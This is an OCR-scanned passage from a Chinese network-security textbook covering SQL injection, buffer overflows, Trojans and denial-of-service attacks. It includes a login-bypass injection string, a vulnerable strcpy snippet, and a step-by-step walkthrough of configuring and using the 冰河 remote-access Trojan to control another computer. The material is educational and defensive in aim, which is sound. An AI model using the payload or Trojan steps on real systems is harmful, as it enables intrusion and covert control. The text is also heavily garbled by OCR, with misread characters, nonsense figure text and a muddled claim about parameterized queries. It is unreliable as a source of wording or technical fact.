cmd.Connection.Open(); 

int n = (int)cmd.ExecuteScalar(); 

cmd.Connection.Close(); 


. 


(3) 攻击 者 在 输入 用 户 名 时 ， 输 入 1'or1='1， 密 码 框 为 空 ， 单 击 “ 登 录 ” 按 钮 。 
(4) 经 过 SQL 注入 攻击 后 生成 的 SQL 命令 变 为 : 


select * from users where username='1'or'1'='1' and password=" 
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SQL 语句 的 逻辑 含义 就 改变 了 ， 服 务 器 执行 的 已 经 不 是 真正 的 身份 认证 ， 系 统 已 经 错 
误 地 授权 给 攻击 者 了 。 


6.5.2 SQL 注入 攻击 的 防范 方法 


SQL 注入 攻击 的 防范 方法 主要 有 以 下 三 种 。 

1. 对 文本 框 进行 过 滤 

将 SQL 中 使 用 的 特殊 符号 ， 如 “'”，“-”，“/*”，“; ”，“%” 等 ， 用 Replace(0) 方 法 过 滤 
掉 ， 缺 少 了 这 些 符号 ， 攻 击 代码 也 就 变 得 没有 意义 了 。 

为 了 防止 这 样 的 SQL 语句 的 注入 攻击 ， 通 常 使 用 ADONET 技术 中 的 
SqlCommand.Parameters 属性 传 参 的 方法 将 非法 字符 过 单 引 号 “'” 过 滤 掉 ， 这 样 or 语句 就 
不 起 作用 了 。 

在 ASPNET 中 过 滤 SQL 非法 字符 ， 首 先 需要 添加 Parameters 参数 的 名 称 、 类 型 和 大 
小 ， 然 后 设置 参数 的 值 ， 最 后 使 用 ADO.NET 技术 执行 查询 数据 。 关 键 代 码 如 下 : 


com.Parameters.Add (nes SqlParameter(“@username”,SqlDbType.VarChar, 50)); 
com.Parameters[“@username”] .Value = TextName.Text; 


2. 限制 文本 框 输入 字符 的 长 度 

如 果 用 户 名 的 长 度 最 多 只 有 10 个 字符 ， 那 么 将 文本 框 输入 字符 的 长 度 也 设置 为 10， 
这 将 大 大 增加 攻击 者 在 SQL 语句 中 插入 恶意 代码 的 难度 。 

3. 检查 用 户 输入 的 合法 性 ， 确 信和 输入 的 内 容 只 包含 合法 的 数据 

可 以 使 用 正则 表达 式 来 检验 数据 是 否 合法 ， 数 据 检查 应 当 在 客户 端 和 服务 器 端 都 执 
行 ， 执 行 服务 器 端的 验证 ， 是 为 了 弥补 客户 端 验证 机 制 的 脆弱 性 。 

SQL 注入 攻击 比较 常见 ， 造 成 的 问题 也 比较 严重 ， 但 只 要 有 针对 性 地 使 用 上 述 方法 ， 
对 输入 的 信息 进行 控制 ， 还 是 可 以 防止 这 种 攻击 的 。 


6.6 ”缓冲 区 溢出 攻击 


目前 最 流行 的 一 种 攻击 技术 就 是 缓冲 区 溢出 攻击 。 当 目标 操作 系统 收 到 了 超过 了 它 能 
接收 的 最 大 信息 量 时 ， 将 发 生 缓冲 区 溢出 。 这 项 攻击 对 技术 要 求 比较 高 ， 但 是 攻击 的 过 程 
却 非常 简单 。 


6.6.1 组 冲 区 溢出 


缓冲 区 溢出 是 指 当 计算 机 程序 向 缓冲 区 内 填充 的 数据 位 数 超过 缓冲 区 本 身 的 容量 ， 洲 
出 的 数据 禾 盖 在 合法 数据 上 。 理 想 情况 是 ， 程 序 检查 数据 长 度 并 且 不 允许 输入 超过 缓冲 区 
长 度 的 字符 串 。 大 多 数 程序 都 会 假设 数据 长 度 总 是 与 所 分 配 的 存储 空间 相 匹 配 ， 这 就 为 组 
冲 区 游 出 埋 下 隐患。 操作 系统 所 使 用 的 缓冲 区 又 被 称 为 堆栈 ， 在 各 个 操作 进程 之 间 ， 指 令 
被 临时 存储 在 堆栈 当中 ， 堆 栈 也 会 出 现 缓冲 区 溢出 。 

缓冲 区 溢出 的 原理 很 简单 ， 如 下 所 示 。 


void function (char * str) 


char buff[16]; 
strcpy (buff, str); 
} 


程序 中 利用 strepy0 函 数 将 str 中 的 内 容 拷贝 到 buff 中 ， 只 要 str 的 长 度 大 于 16， 就 会 
造成 缓冲 区 溢出 ， 存 在 类 似 strcpy0 函 数 这 样 问题 的 C 语言 函数 还 有 很 多 。 
当 一 个 超 长 的 数据 进入 到 缓冲 区 时 ， 超 出 部 分 就 会 被 写 入 其 他 缓冲 区 ， 其 他 缓冲 区 存 
放 的 可 能 是 数据 、 下 一 条 指令 的 指针 或 者 是 其 他 程序 的 输出 内 容 ， 这 些 内 容 都 被 覆盖 或 者 
破坏 掉 了 .可见 一 小 部 分 数据 或 者 一 套 指 令 的 溢出 就 可 能 导致 一 个 程序 或 者 操作 系统 崩溃 。 

缓冲 区 溢出 是 由 编程 错误 引出 的 。 如 果 缓冲 区 被 写 满 , 而 程序 没有 去 检查 缓冲 区 边界 ， 
也 没有 停止 接收 数据 ， 这 时 缓冲 区 溢出 就 会 发 生 。 缓 冲 区 溢出 之 所 以 泛滥 ， 是 由 于 开放 源 
代码 程序 的 本 质 决定 的 。 标 准 C 语言 具有 许多 复制 和 添加 字符 串 的 函数 ,这 使 得 标准 C 语 
言 很 难 进行 边界 检查 。 一 般 情 况 下 ， 和 覆盖 其 他 数据 区 的 数据 是 没有 意义 的 ， 最 多 造成 应 用 
程序 错误 ， 但 是 ， 如 果 输 入 的 数据 是 经 过 “黑客 ”精心 设计 的 ， 覆 盖 缓 冲 区 的 数据 恰恰 是 
“黑客 ”或 者 病毒 的 攻击 程序 代码 ， 一 旦 多 余 字 节 被 编译 执行 ,“ 黑 客 ” 或 者 病毒 就 有 可 能 
为 所 和 欲 为 ， 获 取 系 统 的 控制 权 。 


6.6.2 ”缓冲 区 溢出 的 防御 


缓冲 区 溢出 是 目前 导致 “黑客 ”型 病毒 横行 的 主要 原因 。 从 “红色 代码 ”到 Slammer， 
再 到 “冲击 波 ”， 都 是 利用 缓冲 区 滋 出 漏洞 的 典型 病毒 案例 。 绥 冲 区 溢出 是 一 个 编程 问题 ， 
防止 利用 缓冲 区 溢出 发 起 的 攻击 ， 关 键 在 于 程序 开发 者 在 开发 程序 时 仔细 检查 溢出 情况 ， 
不 允许 数据 溢出 缓冲 区 。 此 外 ， 用 户 需要 经 常 登录 操作 系统 和 应 用 程序 提供 商 的 网 站 ， 跟 
踪 公 布 的 系统 漏洞 ， 及 时 下 载 补丁 程序 ， 弥 补 系统 漏洞 。 因 此 ， 防 御 方 法 大 致 可 以 划分 为 
两 类 。 

(1) 编译 时 防御 ， 目 标 是 加 固 程序 来 抵抗 在 新 程序 中 的 攻击 。 

编译 时 防御 ， 是 指 在 进行 编译 的 时 候 通 过 检测 程序 防止 或 侦 测 缓冲 区 溢出 。 完 成 该 防 
御 的 可 能 性 依赖 于 选择 一 种 不 允许 缓冲 区 溢出 的 高 级 语言 ， 鼓 励 使 用 安全 的 编码 技术 ， 使 
用 安全 的 标准 库 ， 或 者 包含 用 来 检测 栈 帧 是 否 被 破坏 的 附加 代码 。 

(2) 运行 时 防御 ， 目 标 是 在 现 有 的 程序 中 检测 和 终止 攻击 。 

就 像 我 们 已 经 注意 到 的 那样 ， 大 多 数 编译 时 防御 方法 需要 对 现 有 的 程序 重新 编译 。 因 
此 ， 人 们 有 了 对 运行 时 防御 的 兴趣 ， 像 操作 系统 通过 更 新 来 对 存在 漏洞 的 程序 提供 保护 一 
样 ， 运 行 时 防御 也 能 像 这 样 配置 。 


6.7 ”基于 木马 的 攻击 
木马 攻击 是 黑客 最 常用 的 攻击 方法 ， 木 马 的 危害 性 在 于 它 对 计算 机 系统 强大 的 控制 和 


破坏 能 力 、 人 窃取 密码 、 控 制 系统 操作 、 进 行文 件 操作 等 ， 一 台 计 算 机 一 旦 被 一 个 功能 强大 
的 木马 植 入 ， 攻 击 者 就 可 以 像 操作 自己 的 计算 机 一 样 控制 这 人 台 计 算 机 ， 远 程 监控 这 台 计 算 
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机 上 的 所 有 操作 。 

木马 全 称 “ 特 洛 伊 木马 ” 英文 为 Trojan Horse， 它 来 源 于 古 希腊 故事 。 有 一 次 ， 古 希 
腊 大 军 围攻 特洛伊 城 ， 久 攻 不 下 。 于 是 古 希腊 谋士 献计 制造 一 只 高 二 丈 的 大 木马 假装 作战 
神 马 ， 随 后 在 攻击 数 天 后 假装 兵 败 ， 留 下 木马 拔 营 而 去 。 城 中 得 到 解围 的 消息 ， 举 城 欢 庆 ， 
并 把 这 个 奇异 的 战利品 大 木马 搬入 城内 ， 当 全 城 军 民 进入 梦乡 时 ， 藏 于 木马 中 的 将 士 从 木 
马 中 打开 密 门 而 下 ， 打 开 城 门 引入 外 兵 ， 攻 下 特洛伊 城 。 这 就 是 “特洛伊 木马 ”的 来 历 。 
计算 机 界 把 伪装 成 良性 程序 的 文件 形象 地 称 为 “木马 ”。 

木马 主要 有 以 下 特点 : 

(1) 伪装 性 ， 木 马 总 是 伪装 成 其 他 程序 来 迷惑 管理 员 ; 

(2) 潜伏 性 ， 木 马 能 够 毫 无 声响 地 打开 端口 等 待 外 部 连接 ; 

(3) 隐蔽 性 ， 木 马 的 运行 隐蔽 ， 甚 至 使 用 进程 查看 器 都 看 不 出 ; 

(4) 不 易 删除 性 ， 计 算 机 一 旦 中 了 木马 ， 最 省 事 的 方法 就 是 重 装 系统 ; 

(5) 通用 性 ， 即 使 远程 主机 是 Windows 98 系统 ， 入 侵 者 也 可 以 实现 远程 控制 。 

木马 与 后 门 的 区 别 : 本 质 上 ， 木 马 和 后 门 都 是 提供 网 络 后 门 的 功能 ， 但 是 木马 的 功能 
稍微 强大 一 些 ， 一 般 还 有 远程 控制 的 功能 ， 后 门 程序 则 功能 比较 单一 ， 只 是 提供 能 够 登录 
对 方 主 机 的 客户 端 。 


6.7.1 木马 的 分 类 


常见 的 木马 主要 可 以 分 为 以 下 8 种 类 型 。 

1. 破坏 型 木马 

破坏 型 木马 唯一 的 功能 就 是 破坏 并 且 删 除 文件 ， 能 自动 删除 目标 机 上 的 .DLL、.EXE 
文件 ， 所 以 非常 危险 ， 一 旦 被 感染 就 会 严重 威胁 到 计算 机 的 安全 。 

2. 密码 发 送 型 木马 

密码 发 送 型 木马 是 专门 为 了 盗 取 被 感染 的 计算 机 上 的 密码 而 编写 的 ， 木 马 一 旦 执行 ， 
就 会 自动 搜索 内 存 、 临 时 文件 夹 及 各 种 敏感 文件 ， 一 旦 搜索 到 有 用 的 密码 ， 木 马 就 会 利用 
免费 的 电子 邮件 服务 将 密码 发 送 到 指定 的 邮箱 ， 达 到 获取 密码 的 目的 ， 这 类 木马 大 多 使 用 
25 号 端口 发 送 E-mail， 它 们 大 多 会 在 每 次 Windows 重启 时 重新 运行 ， 其 目的 是 找到 所 有 
隐藏 密码 并 且 在 受害 者 不 知道 的 情况 下 把 密码 发 送 到 指定 的 邮箱 。 如 果 目 标 主机 有 隐藏 密 
码 ， 这 些 木 马 是 很 危险 的 。 

3. 远程 访问 型 木马 

最 有 代表 性 的 是 特洛伊 木马 ,如 果 客 户 知道 了 服务 端的 瑟 地 址 ， 只 需 运 行 服务 端 程序 
就 可 以 实现 远程 控制 。 

4. 键盘 记录 型 木马 

这 种 木马 是 非常 简单 的 ， 它 们 只 做 一 件 事情 ， 就 是 记录 被 攻击 者 的 键盘 敲 击 并 且 在 
LOG 文件 里 查找 密码 ， 这 种 木马 随 着 Windows 的 启动 而 启动 。 它 们 分 为 在 线 记 录 和 离线 
记录 ， 分 别 记录 在 线 和 离线 状态 下 敲 击 键盘 时 的 按键 情况 。 从 这 些 按键 中 很 容易 就 会 得 到 
密码 等 有 用 信息 ， 当 然 对 于 这 种 类 型 的 木马 ， 邮 件 发 送 功能 也 是 必 不 可 少 的 。 


5. DoS 攻击 型 木马 

随 着 DoS 攻击 应 用 的 越 来 越 广泛 ， 被 用 做 DoS 攻击 的 木马 也 越 来 越 流 行 起 来 。 当 一 
台 主 机 被 入 侵 并 被 种 上 了 Dos 攻击 木马 ， 那 么 日 后 这 台 计 算 机 就 成 为 Dos 攻击 者 的 最 得 
力 的 助手 了 。 攻 击 者 控制 的 肉鸡 数量 越 多 ， 发 动 DoS 攻击 取得 成 功 的 几率 就 越 大 。 所 以 ， 
这 种 木马 的 危害 不 是 体现 在 被 感染 的 计算 机 上 ， 而 是 体现 在 攻击 者 可 以 利用 它 来 攻击 一 台 
又 一 台 计 算 机 ， 给 网 络 造成 很 大 的 伤害 和 损失 。 

还 有 一 种 类 似 DoS 攻击 型 木马 称 为 邮件 炸弹 木马 ， 一 旦 机 器 被 感染 ， 木 马 就 会 随机 生成 
各 种 各 样 主题 的 信件 ， 对 特定 的 邮箱 不 停 地 发 送 邮 件 ， 一 直到 对 方 瘫痪 ， 不 能 接收 邮件 为 止 。 

6. 代理 型 木马 
黑客 在 入 侵 的 同时 掩盖 自己 的 足迹 ， 谨 防 别 人 发 现 自己 的 身份 是 非常 重要 的 ， 因 此 ， 
给 被 控制 的 肉鸡 种 上 代理 木马 ， 让 其 变 成 攻击 者 发 动 攻击 的 跳板 就 是 代理 木马 最 重要 的 任 
务 。 通 过 代理 木马 ， 攻 击 者 可 以 在 匿名 的 情况 下 使 用 Telnet、ICQ 等 程序 ， 从 而 隐蔽 自己 
踪迹 。 

7. FTP 型 木马 

这 种 木马 可 能 是 最 简单 和 最 古老 的 木马 ， 它 的 唯一 功能 就 是 打开 21 端口 ， 等 待 用 户 
连接 。 现 在 新 FTP 型 木马 还 加 上 了 密码 功能 ， 这 样 ， 只 有 攻击 者 本 人 才 知 道 正 确 的 密码 ， 
从 而 进入 对 方 计算 机 。 

8. 程序 杀手 型 木马 

上 面 的 木马 功能 虽然 形形色色 ， 不 过 要 到 对 方 计算 机 上 发 挥 自己 的 作用 ， 还 要 通过 防 
木马 软件 这 一 关 才 行 , 常见 的 防 木 马 软件 有 ZoneAlarm、Norton Anti-Virus 等 。 程序 杀 手 型 
木马 的 功能 就 是 关闭 对 方 计算 机 上 运行 的 这 类 程序 ， 让 其 他 的 木马 更 好 地 发 挥 作用 。 


6.7.2 ”木马 组 成 


一 个 完整 的 木马 系统 由 硬件 部 分 、 软 件 部 分 和 具体 连接 部 分 组 成 。 

1. 硬件 部 分 

硬件 部 分 指 建立 木马 连接 所 必需 的 硬件 实体 。 

。 控制 端 ， 对 服务 端 进行 远程 控制 的 一 方 。 

。 服务 端 : 被 控制 端 远程 控制 的 一 方 。 

。 Interet: 控制 端 对 服务 端 进行 远程 控制 数据 传输 的 网 络 载体 。 

2. 软件 部 分 

软件 部 分 指 实现 远程 控制 所 必需 的 软件 程序 。 

。 控制 端 程序 : 控制 端 用 以 远程 控制 服务 端的 程序 。 

。 木马 程序 : 潜入 服务 端 内 部 获取 其 操作 权限 的 程序 。 

。 木马 配置 程序 ， 设置 木马 程序 的 端口 号 、 触 发 条 件 、 木 马 名 称 等 ， 使 其 在 服务 端 隐 
藏 得 更 隐蔽 的 程序 。 

3. 具体 连接 部 分 

具体 连接 部 分 指 通过 Intemet 在 服务 端 和 控制 端 之 间 建 立 一 条 木马 通道 所 必需 的 元 素 。 

。 控制 端 他 、 服 务 端 他 : 即 控制 端 服 务 端 的 网 络 地 址 也 是 木马 进行 数据 传输 的 目的 地 。 
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。 控制 端 端口 、 木 马 端口 : 即 控制 端 服务 端的 数据 入 口 ， 通 过 这 个 入 口 数 据 可 直达 控 
制 端 程序 或 木马 程序 。 
6.7.3 ”木马 连接 方式 
1. 传统 连接 方式 
传统 连接 方式 即 C/S 连接 方式 ， 在 这 种 连接 方式 下 ， 远 程 主机 开放 监听 端口 等 待 外 部 
连接 ， 成 为 服务 端 。 当 入 侵 者 需要 与 远程 主机 建立 连接 的 时 候 ， 便 主动 发 出 连接 请 求 ， 从 
而 建立 连接 ， 建 立 过 程 如 图 6-22 所 示 。 


发 出 建立 连接 请 求 远程 主机 Bi 
> 


< 
客户 端 远程 主机 
YY 连接 建立 成 功 y 
> S 
客户 端 远程 主机 


图 6-22 ”传统 连接 方式 


这 种 连接 需要 服务 端 开放 端口 等 待 连接 , 需要 客户 端 知道 服务 端的 瑟 地 址 与 服务 端口 
号 。 因 此 ， 不 适合 与 动态 人 P 地 址 或 局 域 网 内 主机 建立 连接 。 

2. 反弹 端口 连接 方式 

反弹 端口 连接 方式 中 连接 的 建立 不 再 由 客户 端 主动 要 求 连接 ， 而 是 由 服务 端 来 完成 ， 
这 种 连接 过 程 恰恰 与 传统 连接 方式 相反 。 当 远程 主机 安装 木马 后 ， 由 远程 主机 主动 寻找 客 
户 端 建立 连接 ， 客 户 端 则 开放 端口 等 竺 连接， 具体 建立 过 程 如 图 6-23 所 示 。 


要 求 建立 连接 二 


客户 端 远程 主机 

YU 连接 建立 成 功 
> 

客户 端 远程 主机 


图 6-23 反弹 端口 连接 方式 


6.7.4 常见 木马 的 使 用 
例 6-6 使 用 “冰河 ”进行 远程 控制 。 


“冰河 ”包含 两 个 程序 文件 ， 一 个 是 服务 器 端 程序 ， 另 一 个 
是 客户 端 程序 “冰河 ”的 文件 列表 如 图 6-24 所 示 。 

G_SERVER.EXE 文件 是 服务 器 端 程序 ，G_CLIENT.exe 文 
件 是 客户 端 程序 。 将 G_SERVER.EXE (服务 器 端 ) 在 远程 的 计 
算 机 上 执行 以 后 ， 通 过 G_CLIENT.exe 文件 来 控制 远程 的 服务 
器 ， 客 户 端的 主 界面 如 图 6-25 所 示 。 


柯 V&4 [NE\ 
文件 月。 弓 弓 [E] 。 设置 [G] 。 帮 动 {H] 


汶 吕 加 黑 团 生 加 时 二 人 名 妈 


| 当前 连接 : [Locsltes = Wo: Pes 。 访 aoS: [ 应 用 [8] 
ET 


| wy 


G_SERVER. G_CLIENT. 
EXE EXE 


图 6-24 “冰河 ”的 文件 列表 


FE 


图 6-25 “冰河 ”的 客户 端 


将 服务 器 程序 安装 在 对 方 主机 之 前 需要 对 服务 器 程序 做 一 些 设置 ， 比 如 连接 端口 、 连 


接 密 码 等 。 选 择 菜单 栏 “ 设 置 ” 下 的 菜单 项 “配置 服务 器 程序 ” 


在 出 现 的 “服务 器 配置 ” 


对 话 框 中 选择 服务 器 端 程序 G SERVER.EXE 进行 配置 并 填写 访问 服务 器 端 程序 的 口令 ， 


这 里 设置 为 1234， 如 图 6-26 所 示 。 


的 服务 浊 本 各 ol 


图 基本 设置 | 一 自我 保护 | 馈 邮件 通知 | 


安装 路 径 : SYSTEN> 了 | 文件 名 称 : KERNEMNI2. 
进程 名 称 : lindows 访问 口令 : 


mi 庙 口 FE 厂 自动 有 除去 装 文件 屎 禁止 自动 拓 号 


敏感 字符 : 操 令 ,密码 , 连接 , 登录 ,账户 ,password connect, account, login logon 
提示 信息 : 


图 6-26 设置 “冰河 ”服务 器 配置 
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单 击 “ 确 定 ” 按 钮 以 后 ， 就 将 “冰河 ”的 服务 器 程序 安装 到 某 一 台 主机 上 。 目 标 主机 


中 了 冰河 ， 就 可 以 利用 客户 端 程序 来 连接 服务 器 端 程序 。 在 客户 端 添 加 主机 的 地 址 信息 ， 


这 里 的 密码 就 是 刚才 设置 的 口令 1234， 如 图 6-27 所 示 。 
单 击 “ 确 定 ” 按 钮 以 后 , 查看 对 方 计算 机 的 基本 信息 。 对 方 计 算 机 的 目录 列表 如 图 6-28 


所 示 。 
EE Is 
|| 
显示 名 称 : | 虚拟 机 有 
主机 地 址 : 192. 168. 8. 212 
访问 口令 | 
监听 端口 : 628 


图 6-27 使 用 冰河 客户 端 添 加 主机 
从 图 6-28 中 可 以 看 出 ,可 以 在 对 方 计算 机 上 进行 任意 的 操作 。 除 此 以 外 还 可 以 查看 并 


控制 对 方 的 屏幕 等 ， 如 图 6-29 所 示 。 


文件 [日 蝙 强 IE] ”设置 [G] 


TO 
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VE4 INEwFUN < 用 Wan [Eel 
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ET [RE 

机 Dements mds 

国 国 zstpu 
ror Fil 
国 pamz3 
国 aecraled 
国 teals 
ror 
加 ea 146992 2000-1-10 12:00:00 
resetup ee 162816 2000-1-10 12;00;00 
a uroExEC. BAT 0 2002-10-19 5:08:58 
国 boot ini 195 2002-10-19 4:58;20 
固 beottent bin 304824 2000-1-10 12;00;00 
加 cnmre srs 0 2002-10-19 5:08:58 
Bm srs 
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图 6-28 ”查看 对 方 的 目录 列表 


和 性 画 胃 效 句 配 


| 当前 连接 : | 虚拟 机 -| 端口 : [7626 访问 口令 : 5 应 用 [S] 


司 文件 管理 器 | 皮 命 人 控制 台 | 


图 6-29 查看 并 控制 远程 主机 屏幕 


“冰河 ”中 每 个 功能 的 使 用 都 是 通过 图 形 界 面 ， 使 用 起 来 都 很 简单 ， 而 且 在 自 带 的 自 


述 文件 中 介绍 得 非常 详细 ， 这 是 


就 不 再 一 一 介绍 了 。 其 实 ， 木 马 程序 国内 外 有 很 多 ， 基 本 


的 原理 和 功能 基本 上 与 “冰河 ”相似 ， 只 是 可 能 有 的 功能 比较 强大 ， 有 的 功能 比较 简单 而 


已 。 由 于 杀毒 软件 基本 可 以 查 杀 大 多 数 著名 的 木马 程序 ， 所 以 一 些 有 名 的 木马 程序 一 般 不 
适合 来 做 网 络 后 门 程序 。 


6.7.5 ”木马 防御 


用 以 下 方法 进行 防御 ， 基 本 上 可 以 阻止 基于 木马 的 入 侵 。 

1. 显示 文件 扩展 名 

文件 扩展 名 是 文件 格式 和 功能 的 代表 ， 通 过 文件 扩展 名 ， 管 理 员 一 眼 就 能 认 出 文件 的 
真正 身份 ， 比 如 ，.exe 代表 可 执行 文件 、pg 代表 图 形 文件 、txt 代表 文本 文件 、tm 代表 网 
页 文件 等 。 知 道 了 文件 的 扩展 名 ， 再 看 看 文件 的 图 标 ， 如 果 它 们 之 间 的 对 应 不 一 样 ， 比 如 
文件 扩展 名 是 .exe， 但 却 使 用 了 jpg 的 图 标 ， 那 么 就 说 明 这 个 文件 经 过 了 别人 的 修改 ， 这 样 
的 文件 大 多 是 木马 。 

2. 不 打开 任何 可 疑 文件 、 文 件 夹 和 网 页 

以 往 以 为 只 是 执行 那些 扩展 名 为 .exe、.bat 的 文件 才 有 被 黑 的 危险 ， 其 实 打 开 网 页 和 文 
件 夹 也 有 和 危险, 因此 ,只 有 尽量 不 打开 任何 可 疑 文 件 、 文件 夹 和 网 页 , 才能 避免 被 种 植木 马 。 

3. 升级 下 

很 多 木马 是 利用 了 正 的 漏洞 ， 所 以 要 经 常 升 级 正 。 

4. 常 开 病毒 防火 墙 

由 于 病毒 防火 墙 比较 占 系 统 资源 ， 容 易 造 成 系统 缓慢 ， 因 此 许多 管理 员 不 喜欢 开 病毒 
防火 墙 ， 而 是 以 为 新 下 载 的 文件 进行 病毒 扫描 就 足够 了 。 需 要 注意 的 是 ， 仅 仅 使 用 杀毒 软 
件 对 文件 进行 扫描 远 远 不 能 实现 安全 的 目的 ， 病 毒 防 火 墙 能 够 对 系统 进行 实时 监控 ， 及 时 
发 现 活动 的 木马 并 把 它 杀 死 。 

S. 常 开 网 络 防火 墙 

使 用 网 络 防 火 墙 并 进行 相当 的 设置 ， 这 样 一 来 ， 即 使 计算 机 真 的 中 了 木马 程序 ， 防 火 
墙 也 可 以 拦截 大 多 数 木马 的 连接 。 


6.8 ”拒绝 服务 攻击 


6.8.1 DoS 攻击 


拒绝 服务 攻击 是 一 种 针对 某 些 服务 可 用 性 的 攻击 。 从 计算 机 和 通信 安全 的 角度 来 看 ， 
DoS 攻击 一 般 攻击 目标 系统 的 网 络 服务 ， 通 过 攻击 其 网 络 连接 来 实现 。 这 种 针对 服务 可 用 
性 的 攻击 不 同 于 其 他 传统 意义 上 的 不 可 抗力 产生 的 攻击 , 它 是 通过 造成 IT 基础 设备 的 损害 
或 毁坏 而 导致 服务 能 力 的 丧失 。 

NIST 计算 机 安全 事故 处 理 指南 (NIST computer security incident handling guide ) 
【NIST04】 中 对 DoS 攻击 给 出 的 定义 如 下 : 

拒绝 服务 是 一 种 通过 耗 尽 CPU、 内 存 、 带 宽 以 及 磁盘 空间 等 系统 资源 ， 来 阻止 或 削弱 
对 网 络 、 系 统 或 应 用 程序 的 授权 使 用 的 行为 。 
上 述 定义 可 知 ， 可 作为 DoS 攻击 对 象 的 资源 有 下 面 几 类 。 
1. 网 络 带 宽 
网 络 带宽 与 连接 服务 器 和 因特网 的 网 络 链 路 的 容量 相关 。 对 于 大 部 分 机 构 来 说 ， 网 络 
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带宽 指 的 是 连接 到 其 网 络 服务 提供 商 的 链 路 容量 ， 如 图 6-30 给 出 的 网 络 实例 所 示 。 通常 这 
个 连接 的 容量 低 于 ISP 路 由 器 内 部 以 及 ISP 路 由 器 之 间 的 链 路 容量 ， 就 意味 着 可 能 会 发 生 
这 样 的 情况 : 经 过 具有 更 高 容量 的 链 路 到 达 ISP 路 由 器 的 通信 量 要 高 于 到 机 构 的 链 路 的 通 
信 量 。 在 这 种 情况 下 ，ISP 路 由 器 只 能 发 送 链 路 所 能 承载 的 最 大 流量 ， 对 于 超出 的 流量 必 
须 丢 弃 。 在 正常 网 络 运行 环境 下 ， 正 常用 户 的 超 负 荷 访问 ， 同 样 会 使 得 服务 器 网 络 繁忙 。 
那么 这 些 正常 用 户 当中 就 会 随机 地 有 一 部 分 不 能 够 得 到 服务 器 的 响应 ， 对 于 一 个 已 经 超 负 
荷 的 TCP/IP 网 络 连接 来 说 ， 服 务 器 不 可 用 也 是 预料 之 中 的 。 但 在 Dog 攻击 的 情况 下 ， 攻 
击 者 直接 地 或 间接 地 制造 出 大 量 的 恶意 流量 发 往 目标 服务 器 。 这 种 攻击 流量 相 比 任何 的 合 
法 流量 来 说 是 压倒 性 的 ， 从 而 有 效 地 拒绝 了 合法 用 户 对 服务 器 的 访问 。 


图 6-30 说明 DoS 攻击 的 网 络 实例 


2. 系统 资源 

针对 系统 资源 的 Dog 攻击 , 是 通过 使 用 某 些 特殊 数据 包 来 触发 系统 的 网 络 处 理 软件 的 
缺陷 ， 从 而 导致 系统 崩溃 。 如 果 受 到 这 种 DoS 攻击 ， 除 非 管理 员 重 新 启动 网 络 处 理 程序 ， 
否则 服务 器 将 无 法 再 通过 网 络 处 理 程序 来 提供 网 络 服务 。 例 如 ， 经 典 的 死亡 之 ping 攻击 也 
是 这 种 类 型 的 攻击 ， 它 们 主要 是 针对 早期 的 Windows 9x 操作 系统 。 

3. 应 用 资源 

针对 特定 应 用 服务 程序 的 攻击 一 般 使 用 一 定数 量 的 合法 请 求 ， 而 每 个 合法 请 求 都 会 明 
显 地 消耗 掉 服务 器 上 的 系统 资源 ， 从 而 达到 限制 服务 器 响应 其 他 合法 用 户 请 求 的 目的 。 例 
如 ， 某 Web 服务 器 可 能 会 提供 数据 库 查询 服务 ， 如 果 能 够 构造 出 一 个 巨大 的 、 高 代价 的 查 
询 请 求 ， 那么 攻击 者 就 能 够 向 服务 器 提出 大 量 的 这 类 查询 请 求 。 这 样 就 会 限制 Web 服务 器 
响应 其 他 合法 用 户 的 查询 请 求 。 


6.8.2 DoS 攻击 的 原理 与 思想 


DoS 攻击 的 基本 原理 是 使 被 攻击 服务 器 充斥 大 量 要 求 回复 的 信息 ， 消 耗 网 络 带 宽 或 系 
统 资源 ， 导 致 网 络 或 系统 不 胜 负 荷 ， 以 至 于 瘫痪 而 停止 提供 正常 的 网 络 服务 。 

要 对 服务 器 实施 拒绝 服务 攻击 ， 实 质 上 的 方式 有 两 种 : 

(1) 迫使 服务 器 的 缓冲 区 满载 ， 不 接收 新 的 请 求 ; 

(2) 使 用 他 欺骗， 迫使 服务 器 把 合法 用 户 的 连接 复位 ， 影 响 合 法 用 户 的 连接 ， 这 也 是 
Dos 攻击 实施 的 基本 思想 。 

为 便于 理解 ， 介 绍 一 个 简单 的 DogS 攻击 基本 过 程 ， 如 图 6-31 所 示 。 


攻击 者 
虚假 地 址 


图 6-31 一 个 简单 的 DoS 攻击 的 基本 过 程 


攻击 者 先 向 被 攻击 者 发 送 众多 带 有 虚假 地 址 的 请 求 ， 被 攻击 者 发 送 回复 信息 后 等 待 回 
传 信息 ， 由 于 是 伪造 地 址 ， 所 以 被 攻击 者 一 直 等 不 到 回 传 信息 ， 分 配给 这 次 请 求 的 资源 就 
始终 不 被 释放 。 当 被 攻击 者 等 待 一 定时 间 后 ， 连 接 会 因 超时 被 切断 ， 攻 击 者 会 再 度 传送 一 
批 伪 地 址 的 新 请 求 ,这 样 反复 进行 , 被 攻击 者 资源 将 被 耗 尽 ， 最终 导致 被 攻击 者 主机 瘫痪 。 


6.8.3 DoS 攻击 类 型 


DoS 攻击 从 攻击 目的 和 手段 上 主要 分 为 以 下 一 些 类 型 ， 它 们 以 不 同 的 方式 对 目标 网 络 
造成 破坏 。 

1. 带宽 耗 用 DoS 攻击 

最 阴险 的 DoS 攻击 是 带宽 耗 用 攻击 , 它 的 本 质 就 是 攻击 者 消耗 掉 通过 某 个 网 络 的 所 有 
可 用 的 带宽 。 这 种 攻击 可 以 发 生 在 局 域 网 上 ， 不 过 更 常见 的 是 攻击 者 远程 消耗 资源 。 为 了 
达到 这 一 目的 ， 一 种 方法 是 攻击 者 通过 使 用 更 多 的 带宽 造成 受害 者 网 络 的 拥塞 ， 另 一 种 方 
法 是 攻击 通过 征用 多 个 站 点 集中 拥塞 受害 者 的 网 络 连接 来 达到 DoS 攻击 效果 。 

2. 资源 衰竭 DoS 攻击 

资源 衰竭 攻击 与 带宽 耗 用 攻击 的 差异 在 于 前 者 集中 于 系统 资源 而 不 是 网 络 资源 的 消 
耗 。 一 般 来 说 ， 它 涉及 诸如 CPU 利用 率 、 内 存 、 文 件 系统 和 系统 进程 总 数 之 类 系统 资源 的 
消耗 。 攻 击 者 往往 拥有 一 定数 量 系统 资源 的 合法 访问 权 ， 之 后 ， 攻 击 者 会 滥用 这 种 访问 权 
消耗 额外 的 资源 ， 这 样 ， 系 统 或 合法 用 户 被 剥夺 了 原来 享有 的 资源 ， 造 成 系统 崩溃 或 可 利 
用 资源 耗 尽 。 

3. 编程 缺陷 DoS 攻击 

部 分 DoS 攻击 并 不 需要 发 送 大 量 的 数据 包 来 进行 攻击 。 编程 缺 陷 攻 击 就 是 利用 应 用 程 
